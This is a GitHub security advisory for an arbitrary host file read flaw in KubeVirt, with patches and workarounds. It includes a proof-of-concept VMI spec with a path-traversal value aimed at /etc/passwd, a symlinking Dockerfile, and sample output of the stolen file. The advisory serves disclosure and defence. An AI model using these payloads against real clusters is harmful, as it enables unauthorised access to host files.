GHSA-qv98-3369-g364 – kubevirt.io/kubevirt

Package

Manager: go
Name: kubevirt.io/kubevirt
Vulnerable Version: >=0.20.0 <0.55.1

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:P/RL:O/RC:C

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

KubeVirt vulnerable to arbitrary file read on host ### Impact Users with the permission to create VMIs can construct VMI specs which allow them to read arbitrary files on the host. There are three main attack vectors: 1. Some path fields on the VMI spec were not properly validated and allowed passing in relative paths which would have been mounted into the virt-launcher pod. The fields are: `spec.domain.firmware.kernelBoot.container.kernelPath`, `spec.domain.firmware.kernelBoot.container.initrdPath` as well as `spec.volumes[*].containerDisk.path`. Example: ```yaml apiVersion: [kubevirt.io/v1](http://kubevirt.io/v1) kind: VirtualMachineInstance metadata: name: vmi-fedora spec: domain: devices: disks: - disk: bus: virtio name: containerdisk - disk: bus: virtio name: cloudinitdisk - disk: bus: virtio name: containerdisk1 rng: {} resources: requests: memory: 1024M terminationGracePeriodSeconds: 0 volumes: - containerDisk: image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0) name: containerdisk - containerDisk: image: [quay.io/kubevirt/cirros-container-disk-demo:v0.52.0](http://quay.io/kubevirt/cirros-container-disk-demo:v0.52.0) path: test3/../../../../../../../../etc/passwd name: containerdisk1 - cloudInitNoCloud: userData: | #!/bin/sh echo 'just something to make cirros happy' name: cloudinitdisk ``` 2. Instead of passing in relative links on the API, using malicious links in the containerDisk itself can have the same effect: ```Dockerfile FROM <anybase> RUN mkdir -p /etc/ && touch /etc/passwd RUN mkdir -p /disks/ && ln -s /etc/passwd /disks/disk.img ``` 3. KubeVirt allows PVC hotplugging. The hotplugged PVC is under user-control and it is possible to place absolute links there. Since containerDisk and hotplug code use the same mechanism to provide the disk to the virt-launcher pod, it can be used too to do arbitrary host file reads. In all three cases it is then possible to at lest read any host file: ``` $ sudo cat /dev/vdc root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin [...] ``` ### Patches KubeVirt 0.55.1 provides patches to fix the vulnerability. ### Workarounds * Ensure that the `HotplugVolumes` feature-gate is disabled * ContainerDisk support can't be disabled. The only known way to mitigate this issue is create with e.g. policy controller a conditiontemplate which ensures that no containerDisk gets added and that `spec.domain.firmware.kernelBoot` is not used on VirtualMachineInstances.| * Ensure that SELinux is enabled. It blocks most attempts to read host files but does not provide a 100% guarantee (like vm-to-vm read may still work). ### References Disclosure notice form the discovering party: https://github.com/google/security-research/security/advisories/GHSA-cvx8-ppmc-78hm ### For more information For interested vendors which have to provide a fix for their supported versions, the following PRs are providing the fix: * https://github.com/kubevirt/kubevirt/pull/8198 * https://github.com/kubevirt/kubevirt/pull/8268 ### Credits Oliver Brooks and James Klopchic of NCC Group Diane Dubois and Roman Mohr of Google

Metadata

Created: 2022-09-15T03:20:35Z
Modified: 2022-09-15T03:20:35Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/09/GHSA-qv98-3369-g364/GHSA-qv98-3369-g364.json
CWE IDs: []
Alternative ID: N/A
Finding: F063
Auto approve: 1